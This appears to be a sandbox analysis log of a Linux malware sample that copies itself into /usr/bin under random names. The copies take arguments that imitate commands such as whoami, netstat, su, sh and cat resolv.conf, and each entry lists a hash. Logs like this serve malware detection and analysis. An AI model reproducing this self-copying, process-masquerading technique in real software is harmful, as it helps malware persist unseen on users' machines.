                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tqltcdysxm
                                                        Arguments:/usr/bin/tqltcdysxm gnome-terminal 9452
                                                        File size:548649 bytes
                                                        MD5 hash:7d8d4986b078e4b4d548d598944da309

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tqltcdysxm
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:7d8d4986b078e4b4d548d598944da309

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tqltcdysxm
                                                        Arguments:/usr/bin/tqltcdysxm "cat resolv.conf" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:7d8d4986b078e4b4d548d598944da309

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tqltcdysxm
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:7d8d4986b078e4b4d548d598944da309

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ppcowopkho
                                                        Arguments:/usr/bin/ppcowopkho top 9452
                                                        File size:548660 bytes
                                                        MD5 hash:a05d99f8205a2f4eac9b068780a867b6

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ppcowopkho
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:a05d99f8205a2f4eac9b068780a867b6

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ppcowopkho
                                                        Arguments:/usr/bin/ppcowopkho whoami 9452
                                                        File size:548660 bytes
                                                        MD5 hash:a05d99f8205a2f4eac9b068780a867b6

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ppcowopkho
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:a05d99f8205a2f4eac9b068780a867b6

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ppcowopkho
                                                        Arguments:/usr/bin/ppcowopkho ifconfig 9452
                                                        File size:548660 bytes
                                                        MD5 hash:a05d99f8205a2f4eac9b068780a867b6

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ppcowopkho
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:a05d99f8205a2f4eac9b068780a867b6

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ppcowopkho
                                                        Arguments:/usr/bin/ppcowopkho uptime 9452
                                                        File size:548660 bytes
                                                        MD5 hash:a05d99f8205a2f4eac9b068780a867b6

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ppcowopkho
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:a05d99f8205a2f4eac9b068780a867b6

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ppcowopkho
                                                        Arguments:/usr/bin/ppcowopkho sh 9452
                                                        File size:548660 bytes
                                                        MD5 hash:a05d99f8205a2f4eac9b068780a867b6

                                                        Start time:19:54:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ppcowopkho
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:a05d99f8205a2f4eac9b068780a867b6

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/fzsohllyia
                                                        Arguments:/usr/bin/fzsohllyia top 9452
                                                        File size:548660 bytes
                                                        MD5 hash:e56044b8511b441d2e35e614289e66cc

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/fzsohllyia
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:e56044b8511b441d2e35e614289e66cc

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/fzsohllyia
                                                        Arguments:/usr/bin/fzsohllyia bash 9452
                                                        File size:548660 bytes
                                                        MD5 hash:e56044b8511b441d2e35e614289e66cc

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/fzsohllyia
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:e56044b8511b441d2e35e614289e66cc

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/fzsohllyia
                                                        Arguments:/usr/bin/fzsohllyia bash 9452
                                                        File size:548660 bytes
                                                        MD5 hash:e56044b8511b441d2e35e614289e66cc

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/fzsohllyia
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:e56044b8511b441d2e35e614289e66cc

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/fzsohllyia
                                                        Arguments:/usr/bin/fzsohllyia whoami 9452
                                                        File size:548660 bytes
                                                        MD5 hash:e56044b8511b441d2e35e614289e66cc

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/fzsohllyia
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:e56044b8511b441d2e35e614289e66cc

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/fzsohllyia
                                                        Arguments:/usr/bin/fzsohllyia ifconfig 9452
                                                        File size:548660 bytes
                                                        MD5 hash:e56044b8511b441d2e35e614289e66cc

                                                        Start time:19:54:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/fzsohllyia
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:e56044b8511b441d2e35e614289e66cc

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/qkefrqjuaf
                                                        Arguments:/usr/bin/qkefrqjuaf su 9452
                                                        File size:548671 bytes
                                                        MD5 hash:c5c77fa56b7239e1b5fe8c0888e843f5

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/qkefrqjuaf
                                                        Arguments:n/a
                                                        File size:548671 bytes
                                                        MD5 hash:c5c77fa56b7239e1b5fe8c0888e843f5

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/qkefrqjuaf
                                                        Arguments:/usr/bin/qkefrqjuaf su 9452
                                                        File size:548671 bytes
                                                        MD5 hash:c5c77fa56b7239e1b5fe8c0888e843f5

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/qkefrqjuaf
                                                        Arguments:n/a
                                                        File size:548671 bytes
                                                        MD5 hash:c5c77fa56b7239e1b5fe8c0888e843f5

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/qkefrqjuaf
                                                        Arguments:/usr/bin/qkefrqjuaf "echo \"find\"" 9452
                                                        File size:548671 bytes
                                                        MD5 hash:c5c77fa56b7239e1b5fe8c0888e843f5

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/qkefrqjuaf
                                                        Arguments:n/a
                                                        File size:548671 bytes
                                                        MD5 hash:c5c77fa56b7239e1b5fe8c0888e843f5

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/qkefrqjuaf
                                                        Arguments:/usr/bin/qkefrqjuaf "netstat -an" 9452
                                                        File size:548671 bytes
                                                        MD5 hash:c5c77fa56b7239e1b5fe8c0888e843f5

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/qkefrqjuaf
                                                        Arguments:n/a
                                                        File size:548671 bytes
                                                        MD5 hash:c5c77fa56b7239e1b5fe8c0888e843f5

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/qkefrqjuaf
                                                        Arguments:/usr/bin/qkefrqjuaf "ls -la" 9452
                                                        File size:548671 bytes
                                                        MD5 hash:c5c77fa56b7239e1b5fe8c0888e843f5

                                                        Start time:19:54:59
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/qkefrqjuaf
                                                        Arguments:n/a
                                                        File size:548671 bytes
                                                        MD5 hash:c5c77fa56b7239e1b5fe8c0888e843f5

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/rbihsknkpv
                                                        Arguments:/usr/bin/rbihsknkpv ls 9452
                                                        File size:548660 bytes
                                                        MD5 hash:0288fab43e01f9089db9bbcb7cbe3ebd

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/rbihsknkpv
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:0288fab43e01f9089db9bbcb7cbe3ebd

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/rbihsknkpv
                                                        Arguments:/usr/bin/rbihsknkpv ls 9452
                                                        File size:548660 bytes
                                                        MD5 hash:0288fab43e01f9089db9bbcb7cbe3ebd

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/rbihsknkpv
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:0288fab43e01f9089db9bbcb7cbe3ebd

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/rbihsknkpv
                                                        Arguments:/usr/bin/rbihsknkpv id 9452
                                                        File size:548660 bytes
                                                        MD5 hash:0288fab43e01f9089db9bbcb7cbe3ebd

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/rbihsknkpv
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:0288fab43e01f9089db9bbcb7cbe3ebd

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/rbihsknkpv
                                                        Arguments:/usr/bin/rbihsknkpv "grep \"A\"" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:0288fab43e01f9089db9bbcb7cbe3ebd

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/rbihsknkpv
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:0288fab43e01f9089db9bbcb7cbe3ebd

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/rbihsknkpv
                                                        Arguments:/usr/bin/rbihsknkpv who 9452
                                                        File size:548660 bytes
                                                        MD5 hash:0288fab43e01f9089db9bbcb7cbe3ebd

                                                        Start time:19:55:04
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/rbihsknkpv
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:0288fab43e01f9089db9bbcb7cbe3ebd

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eqbvlwquue
                                                        Arguments:/usr/bin/eqbvlwquue "netstat -an" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:5d3078f2fa3ca5271fd133aad642d232

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eqbvlwquue
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:5d3078f2fa3ca5271fd133aad642d232

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eqbvlwquue
                                                        Arguments:/usr/bin/eqbvlwquue su 9452
                                                        File size:548660 bytes
                                                        MD5 hash:5d3078f2fa3ca5271fd133aad642d232

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eqbvlwquue
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:5d3078f2fa3ca5271fd133aad642d232

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eqbvlwquue
                                                        Arguments:/usr/bin/eqbvlwquue "sleep 1" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:5d3078f2fa3ca5271fd133aad642d232

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eqbvlwquue
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:5d3078f2fa3ca5271fd133aad642d232

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eqbvlwquue
                                                        Arguments:/usr/bin/eqbvlwquue "cd /etc" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:5d3078f2fa3ca5271fd133aad642d232

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eqbvlwquue
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:5d3078f2fa3ca5271fd133aad642d232

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eqbvlwquue
                                                        Arguments:/usr/bin/eqbvlwquue "cat resolv.conf" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:5d3078f2fa3ca5271fd133aad642d232

                                                        Start time:19:55:09
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eqbvlwquue
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:5d3078f2fa3ca5271fd133aad642d232

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/xjmgjvgxwo
                                                        Arguments:/usr/bin/xjmgjvgxwo uptime 9452
                                                        File size:548660 bytes
                                                        MD5 hash:9faeab7565afcf89b3b068708d7e849f

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/xjmgjvgxwo
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:9faeab7565afcf89b3b068708d7e849f

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/xjmgjvgxwo
                                                        Arguments:/usr/bin/xjmgjvgxwo "cd /etc" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:9faeab7565afcf89b3b068708d7e849f

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/xjmgjvgxwo
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:9faeab7565afcf89b3b068708d7e849f

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/xjmgjvgxwo
                                                        Arguments:/usr/bin/xjmgjvgxwo "echo \"find\"" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:9faeab7565afcf89b3b068708d7e849f

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/xjmgjvgxwo
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:9faeab7565afcf89b3b068708d7e849f

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/xjmgjvgxwo
                                                        Arguments:/usr/bin/xjmgjvgxwo uptime 9452
                                                        File size:548660 bytes
                                                        MD5 hash:9faeab7565afcf89b3b068708d7e849f

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/xjmgjvgxwo
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:9faeab7565afcf89b3b068708d7e849f

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/xjmgjvgxwo
                                                        Arguments:/usr/bin/xjmgjvgxwo uptime 9452
                                                        File size:548660 bytes
                                                        MD5 hash:9faeab7565afcf89b3b068708d7e849f

                                                        Start time:19:55:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/xjmgjvgxwo
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:9faeab7565afcf89b3b068708d7e849f

                                                        Start time:19:55:19
